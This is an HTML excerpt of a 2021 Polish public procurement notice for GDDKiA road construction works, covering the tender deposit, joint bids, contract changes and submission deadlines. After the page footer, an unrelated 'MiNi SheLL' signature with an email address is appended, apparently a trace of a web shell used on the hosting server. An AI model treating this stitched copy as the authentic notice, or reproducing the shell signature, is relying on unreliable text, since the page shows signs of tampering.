class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 30 000 PLN (słownie<br/>złotych: trzydzieści tysięcy).<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku<br/>następujących formach wymienionych w art. 97 ust. 7 ustawy Pzp, w zależności od wyboru<br/>Wykonawcy.<br/>3. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. Wadium takie musi<br/>obejmować cały okres związania ofertą. Treść gwarancji lub poręczenia nie może zawierać<br/>postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu<br/>gwarancyjnego do gwaranta. Jako Beneficjenta wadium wnoszonego w formie poręczeń lub<br/>gwarancji należy wskazać – „Skarb Państwa – Generalny Dyrektor Dróg Krajowych i<br/>Autostrad/Generalna Dyrekcja Dróg Krajowych i Autostrad z siedzibą przy ul. Wroniej 53, 00-<br/>874 Warszawa” . W przypadku wniesienia wadium w formie gwarancji lub poręczenia,<br/>koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie<br/>przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp.<br/>Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe<br/>zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne<br/>na pierwsze pisemne żądanie Zamawiającego .<br/>Gwarancja lub poręczenie musi zawierać w swojej treści wskazanie adresu e mail lub adresu<br/>pocztowego na który Zamawiający prześle oświadczenie o zwolnieniu wadium.<br/>Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą<br/>płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium<br/>wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć<br/>się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z<br/>prawem polskim<br/>i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa.<br/>4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na rachunek<br/>bankowy Zamawiającego nr 22 1130 1219 0026 3102 9790 0001 (w tytule przelewu należy<br/>wpisać znak postępowania), najpóźniej przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o<br/>których mowa w pkt 9.2. IDW , natomiast spełnianie warunków udziału w postępowaniu<br/>Wykonawcy wykazują zgodnie z pkt 8.2. IDW.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w pkt. 10.2 IDW składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z zapisami PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-26 10:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny by złożone za pośrednictwem Platformy zakupowej https:// gddkia.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-24</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com